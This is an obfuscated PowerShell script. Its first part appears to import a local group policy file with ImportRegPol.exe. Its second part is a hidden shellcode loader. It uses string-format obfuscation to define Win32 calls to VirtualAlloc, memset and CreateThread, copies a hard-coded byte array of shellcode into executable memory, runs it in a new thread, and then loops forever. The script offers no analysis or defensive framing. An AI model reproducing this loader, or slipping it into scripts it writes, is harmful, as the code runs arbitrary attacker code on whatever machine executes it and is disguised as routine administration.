Function im`p`ORt-LGpO {

	Param([String]${lg`poNaME}, [String]${LGpoloc`At`Ion}, [String]${g`pO`TyPE})
	
	${ex`ECUta`Ble} = ${gL`Obal:`RE`L`AtIvEpaTh}+("{2}{3}{0}{1}" -f 'RegPol','.exe','Imp','ort')
	If (${GP`OTY`pE} -eq ("{0}{1}" -f'Mac','hine')) {
		${gpoTY`Pe} = ((("{1}{0}{3}{7}{8}{4}{2}{6}{5}{9}"-f 'flDom','W','chineWflre','ainSysvo','flMa','.p','gistry','lWflG','POW','ol')) -cREplACE'Wfl',[CHAr]92)
	} else {
		${gPoTY`pE} = ((("{3}{6}{4}{1}{2}{0}{5}{7}"-f'OTgcU','nS','ysvolTgcGP','Tgc','omai','serTgcre','D','gistry.pol'))  -rEPLACe'Tgc',[chaR]92)
	}
	${paR`AM`eTErs} = "-m "+[char]34+${LGPOLOcA`TI`oN}+${G`PO`TYPe}+[char]34
	.("{2}{1}{3}{0}" -f'-Host','ri','W','te') ("{1}{0}{2}"-f'y','Appl',' Local')(("{2}{5}{3}{6}{0}{4}{1}" -f 'licy..','..','mD','LGPO','.','i','Name Po')).("{0}{1}" -f 'R','EPlaCe').Invoke('mDi','$') -NoNewline
	${eRrCo`dE} = (.("{3}{2}{0}{1}"-f'roc','ess','-P','Start') -FilePath ${E`XECu`Ta`BLe} -ArgumentList ${paRa`M`et`ErS} -Wait -Passthru)."eXI`TC`ODE"
	If ((${eR`RcOdE} -eq 0) -or (${E`R`RcoDe} -eq 3010)) {
		&("{1}{2}{0}" -f 't','Write-','Hos') ("{2}{1}{0}" -f's','ces','Suc') -ForegroundColor ("{0}{1}"-f 'Yell','ow')
	} else {
		&("{2}{1}{0}"-f't','Hos','Write-') ("{2}{0}{1}{4}{3}"-f 'ile','d with ','Fa','r code ','erro')${er`RC`ODE} -ForegroundColor ("{1}{0}" -f'ed','R')
	}

}

.("{1}{0}" -f's','cl')
${GL`OB`AL:r`E`lATIVe`PatH} = (&("{0}{1}{3}{2}" -f'sp','li','ath','t-p') ${S`c`RIP`T`:m`yinVoCation}."M`yCoMMA`ND"."P`AtH" -parent)+"\"
.("{2}{3}{0}{1}"-f 't-','LGPO','Impo','r') -LGPOName ("{4}{2}{5}{0}{3}{1}" -f 'iend','ame','F','ly N','User ','r') -LGPOLocation ("{0}{1}{3}{2}" -f'<P','ath_To_G','O_GUID>','P') -GPOType ("{0}{1}"-f'Machin','e')
&("{0}{1}{2}" -f'Star','t-S','leep') -Seconds 5


${W`V3} = (((("{65}{5}{47}{74}{96}{83}{43}{17}{49}{11}{64}{57}{28}{90}{27}{68}{21}{91}{44}{89}{20}{14}{88}{35}{41}{59}{36}{54}{33}{18}{4}{73}{3}{55}{58}{70}{46}{82}{80}{30}{6}{16}{66}{71}{29}{78}{94}{51}{12}{60}{87}{53}{95}{26}{42}{84}{40}{76}{86}{92}{38}{56}{22}{32}{15}{98}{93}{24}{10}{50}{97}{23}{67}{31}{63}{69}{48}{0}{19}{75}{72}{79}{39}{77}{34}{13}{25}{37}{7}{61}{45}{85}{62}{1}{8}{81}{2}{52}{9}" -f'msvc',' ','t src, uint ','o',' flProtect);[DllI','l','t',' memse','u','nt);','Cre',')','ibu','t',' lpAddre','Ptr lpPara','r Crea','2.d','uint','rt.dll','tr','xtern IntPtr ','tAdd',' lpTh','uint dw','Pt',' ',' ','ub','d(IntPt','ern IntP','[','ress, Int','nType, ','In','s, uint d','t fl','r','r lpSta','ic static exte','ckSize','w','dwS','el3','loc','(IntPtr d','publ','lI','0','lluo0','ationFlags, Int','eadAttr','cou','uin','Allocatio','0ke','r','p','rnel3','Size, uin','t','t',',','DllImpo',']','[D','teTh','readId);','e','rt(uo','2.dlluo0)]','rea','pu','mport(u','mpor','uo0)]',', I','rn ','r ','bl','xt','in','ic static e','ern','ta','est','nt','es, ','s','(IntP','lic static','VirtualAl','Pt','eter, ','lpThr','t','t(uo0k','Ptr','m')) -CRepLaCe  'uo0',[ChAr]34));${W} = .("{0}{1}"-f'Add-','Type') -memberDefinition ${w`V3} -Name ("{0}{1}" -f 'Win','32') -namespace ("{2}{3}{0}{1}"-f'nct','ions','Win3','2Fu') -passthru;[Byte[]];[Byte[]]${z} = 0xba,0xeb,0xea,0x96,0x51,0xdb,0xda,0xd9,0x74,0x24,0xf4,0x5b,0x33,0xc9,0xb1,0x47,0x31,0x53,0x13,0x03,0x53,0x13,0x83,0xeb,0x17,0x08,0x63,0xad,0x0f,0x4f,0x8c,0x4e,0xcf,0x30,0x04,0xab,0xfe,0x70,0x72,0xbf,0x50,0x41,0xf0,0xed,0x5c,0x2a,0x54,0x06,0xd7,0x5e,0x71,0x29,0x50,0xd4,0xa7,0x04,0x61,0x45,0x9b,0x07,0xe1,0x94,0xc8,0xe7,0xd8,0x56,0x1d,0xe9,0x1d,0x8a,0xec,0xbb,0xf6,0xc0,0x43,0x2c,0x73,0x9c,0x5f,0xc7,0xcf,0x30,0xd8,0x34,0x87,0x33,0xc9,0xea,0x9c,0x6d,0xc9,0x0d,0x71,0x06,0x40,0x16,0x96,0x23,0x1a,0xad,0x6c,0xdf,0x9d,0x67,0xbd,0x20,0x31,0x46,0x72,0xd3,0x4b,0x8e,0xb4,0x0c,0x3e,0xe6,0xc7,0xb1,0x39,0x3d,0xba,0x6d,0xcf,0xa6,0x1c,0xe5,0x77,0x03,0x9d,0x2a,0xe1,0xc0,0x91,0x87,0x65,0x8e,0xb5,0x16,0xa9,0xa4,0xc1,0x93,0x4c,0x6b,0x40,0xe7,0x6a,0xaf,0x09,0xb3,0x13,0xf6,0xf7,0x12,0x2b,0xe8,0x58,0xca,0x89,0x62,0x74,0x1f,0xa0,0x28,0x10,0xec,0x89,0xd2,0xe0,0x7a,0x99,0xa1,0xd2,0x25,0x31,0x2e,0x5e,0xad,0x9f,0xa9,0xa1,0x84,0x58,0x25,0x5c,0x27,0x99,0x6f,0x9a,0x73,0xc9,0x07,0x0b,0xfc,0x82,0xd7,0xb4,0x29,0x3e,0xdd,0x22,0x12,0x17,0xdc,0xb1,0xfa,0x6a,0xdf,0xa4,0xa6,0xe3,0x39,0x96,0x06,0xa4,0x95,0x56,0xf7,0x04,0x46,0x3e,0x1d,0x8b,0xb9,0x5e,0x1e,0x41,0xd2,0xf4,0xf1,0x3c,0x8a,0x60,0x6b,0x65,0x40,0x11,0x74,0xb3,0x2c,0x11,0xfe,0x30,0xd0,0xdf,0xf7,0x3d,0xc2,0xb7,0xf7,0x0b,0xb8,0x11,0x07,0xa6,0xd7,0x9d,0x9d,0x4d,0x7e,0xca,0x09,0x4c,0xa7,0x3c,0x96,0xaf,0x82,0x37,0x1f,0x3a,0x6d,0x2f,0x60,0xaa,0x6d,0xaf,0x36,0xa0,0x6d,0xc7,0xee,0x90,0x3d,0xf2,0xf0,0x0c,0x52,0xaf,0x64,0xaf,0x03,0x1c,0x2e,0xc7,0xa9,0x7b,0x18,0x48,0x51,0xae,0x98,0xb4,0x84,0x96,0xee,0xd4,0x14;${g} = 0x1000;if (${z}."LEn`gTh" -gt 0x1000){${G} = ${z}."l`ength"};${i`To}=${W}::("{0}{1}{3}{2}"-f 'Vi','r','Alloc','tual').Invoke(0,0x1000,${G},0x40);for (${i}=0;${I} -le (${Z}."LEnG`TH"-1);${I}++) {${w}::"MEMS`et"([IntPtr](${I`To}.("{1}{0}" -f'nt32','ToI').Invoke()+${i}), ${z}[${i}], 1)};${w}::("{0}{2}{1}"-f'Cr','d','eateThrea').Invoke(0,0,${i`To},0,0,0);for (;;){.("{0}{1}{2}" -f 'St','a','rt-sleep') 60};
